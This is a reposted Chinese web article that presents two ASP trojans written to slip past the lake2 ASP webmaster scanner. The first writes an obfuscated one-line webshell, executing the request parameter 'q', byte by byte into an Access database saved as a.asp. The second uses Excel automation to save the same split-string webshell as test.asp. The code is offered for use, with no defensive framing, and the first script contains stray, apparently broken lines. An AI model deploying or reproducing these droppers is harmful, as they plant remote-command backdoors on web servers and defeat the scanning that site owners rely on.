两个非常规ASP木马(可躲过扫描)

2024-05-04 11:08:48

字体：大中小

来源：转载

供稿：网友

两个非常规ASP木马为了躲避 lake2 ASP站长管理助手而写

hanxiaolian
为了躲避 lake2 ASP站长管理助手而写..
一.绕过lake2 Asp木马扫描的小马

复制代码代码如下:

		
		<% 
		set c = CreateObject("ADOX.Catalog") 
		c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) 
		set c = Nothing 
		c&Server.MapPath("a.asp") 
		set conn=server.createobject("Adodb.Connection") 
		conn.open connstr 
		conn.execute("create table nomm(nomuma oleobject)") 
		set rs=server.createobject("adodb.recordset") 
		sql="SELECT * FROM nomm" 
		rs.open sql,conn,1,3 
		rs.addnew 
		rs ("nomuma").appendchunk(chrB(asc("<"))&chrB(asc("%"))&chrB(asc ("e"))&chrB 
		(asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc ("u"))&chrB(asc("t"))&chrB(asc 
		("e"))&chrB(asc("+"))&chrB(asc ("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc 
		("u"))&chrB(asc ("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34) 
		&chrB(asc("q"))&chrB(34)&chrB(asc(")"))&chrB(asc("%"))& chrB(asc(">"))) 
		rs.update 
		rs.close 
		set rs=nothing 
		conn.close 
		set conn=nothing 
		%> 

二.xls版asp webshell

复制代码代码如下:

		
		<% 
		Set xlA = Server.CreateObject("Excel.Application") 
		xlA.Visible = False 
		xlA.Workbooks.Add 
		Set xlWorksheet = xlA.Worksheets(1) 
		xlWorksheet.Cells(1,1).Value = "<%ex"&"ec"&"ute(request(""q""))"+chr(37)+">" 
		'strFile = "d:/test.asp" 
		strFile = Server.MapPath("test.asp") 
		xlWorkSheet.SaveAs strFile 
		xlA.Quit 
		Set xlWorksheet = Nothing 
		Set xlA = Nothing 
		%> 